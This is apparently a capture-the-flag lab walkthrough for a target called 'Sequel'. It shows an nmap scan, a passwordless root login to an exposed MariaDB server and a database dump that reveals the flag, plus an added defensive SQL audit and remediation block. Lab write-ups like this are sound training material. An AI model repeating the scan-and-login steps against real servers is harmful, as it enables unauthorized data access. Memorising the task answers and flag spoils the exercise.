
Sequel

Initial Scan

nmap -sT -sV -T4 -A -v 10.129.19.38 
Starting Nmap 7.80 ( https://nmap.org ) at 2022-08-10 17:15 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:15
Completed NSE at 17:15, 0.00s elapsed
Initiating NSE at 17:15
Completed NSE at 17:15, 0.00s elapsed
Initiating NSE at 17:15
Completed NSE at 17:15, 0.00s elapsed
Initiating Ping Scan at 17:15
Scanning 10.129.19.38 [2 ports]
Completed Ping Scan at 17:15, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:15
Completed Parallel DNS resolution of 1 host. at 17:15, 0.08s elapsed
Initiating Connect Scan at 17:15
Scanning 10.129.19.38 [1000 ports]
Discovered open port 3306/tcp on 10.129.19.38
Completed Connect Scan at 17:15, 0.81s elapsed (1000 total ports)
Initiating Service scan at 17:15
Scanning 1 service on 10.129.19.38
Completed Service scan at 17:17, 157.53s elapsed (1 service on 1 host)
NSE: Script scanning 10.129.19.38.
Initiating NSE at 17:17
Completed NSE at 17:18, 20.11s elapsed
Initiating NSE at 17:18
Completed NSE at 17:18, 1.06s elapsed
Initiating NSE at 17:18
Completed NSE at 17:18, 0.00s elapsed
Nmap scan report for 10.129.19.38
Host is up (0.052s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE VERSION
3306/tcp open  mysql?
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|   Thread ID: 128
|   Capabilities flags: 63486
|   Some Capabilities: Support41Auth, Speaks41ProtocolOld, Speaks41ProtocolNew, LongColumnFlag, IgnoreSigpipes, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, SupportsTransactions, ConnectWithDatabase, SupportsCompression, InteractiveClient, IgnoreSpaceBeforeParenthesis, FoundRows, ODBCClient, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: aNCEn{?ipx-pp`q6W7KS
|_  Auth Plugin Name: mysql_native_password

NSE: Script Post-scanning.
Initiating NSE at 17:18
Completed NSE at 17:18, 0.00s elapsed
Initiating NSE at 17:18
Completed NSE at 17:18, 0.00s elapsed
Initiating NSE at 17:18
Completed NSE at 17:18, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.92 seconds

Task 1

What does the acronym SQL stand for?

Previous rooms and general knowledge

Answer: Structured Query Language

Task 2

During our scan, which port running mysql do we find?

Found in initial scan

Answer: 3306

Task 3

What community-developed MySQL version is the target running?

Found in initial scan

Answer: MariaDB

Task 4

What switch do we need to use in order to specify a login username for the MySQL service?

mysql --help

mysql --help | grep user    
  -u, --user=name     User for login if not current user.
user                                      (No default value)

Answer: -u

Task 5

Which username allows us to log into MariaDB without providing a password?

Google'd for this answer

Using unix_socket means that if you are the system root user, you can login as root@localhost without a password. This technique was pioneered by Otto Kekäläinen in Debian MariaDB packages and has been successfully used in Debian since as early as MariaDB 10.0.

Answer: root
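
A defender-side audit for the condition this task relies on, added here as an example and not part of the original walkthrough: it lists accounts that accept an empty password and marks the ones reachable over the network. It assumes the mysql.user layout of MariaDB 10.3 and later; the 'root'@'localhost' and 'root'@'%' entries in the remediation part are placeholders, since the page does not show the target's account rows.

```sql
-- Added example: run in the mysql client as an administrative user.
-- Assumes MariaDB 10.3+ where mysql.user (a table in 10.3, a view in 10.4+)
-- exposes User, Host, plugin, Password, authentication_string and is_role.

-- 1. Accounts that authenticate with an empty password.
--    unix_socket accounts are left out: they have no password by design and
--    only work over the local socket for the matching OS user.
SELECT User, Host, plugin,
       CASE WHEN Host IN ('localhost', '127.0.0.1', '::1')
            THEN 'local only'
            ELSE 'network reachable'
       END AS exposure
FROM mysql.user
WHERE is_role = 'N'
  AND plugin IN ('', 'mysql_native_password', 'mysql_old_password')
  AND Password = ''
  AND authentication_string = ''
ORDER BY exposure DESC, User, Host;

-- 2. How the server itself is exposed (the scan above found 3306/tcp open).
--    bind_address is only listed on versions that expose it as a variable.
SHOW GLOBAL VARIABLES
WHERE Variable_name IN ('bind_address', 'skip_networking', 'port');

-- 3. Remediation sketch. Host values are placeholders: use the rows that
--    query 1 returned.
--    Local root: authenticate through the OS account over the socket.
--    On builds without the plugin preloaded, install it first with
--    INSTALL SONAME 'auth_socket';
ALTER USER 'root'@'localhost' IDENTIFIED VIA unix_socket;

--    A root entry that matches remote hosts: remove it instead of keeping a
--    privileged account reachable from the network.
DROP USER IF EXISTS 'root'@'%';

-- 4. Re-run query 1; it should return no 'network reachable' rows.
```

An empty result from query 1 combined with a loopback bind_address means a login like the one in Task 8 would be refused.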

Task 6

What symbol can we use to specify within the query that we want to display everything inside a table?

The common symbol used to mean "everything" is the asterisk (wildcard).

Answer: *

Task 7

What symbol do we need to end each query with?

Looking at SQL examples, we see queries ending with a semi-colon (;)

use users_database;

Answer: ;

Task 8

Submit root flag

mysql -h 10.129.19.38 -u root
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 132
Server version: 5.5.5-10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2022, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.05 sec)

mysql> use htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+
2 rows in set (0.05 sec)

mysql> select * from config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  3 | auto_logon            | false                            |
|  4 | max_size              | 2M                               |
|  5 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915da8 |
|  6 | enable_uploads        | false                            |
|  7 | authentication_method | radius                           |
+----+-----------------------+----------------------------------+
7 rows in set (0.05 sec)

mysql>

Answer: 7b4bec00d1a39e3dd4e021ec3d915da8

Last updated 2 years ago
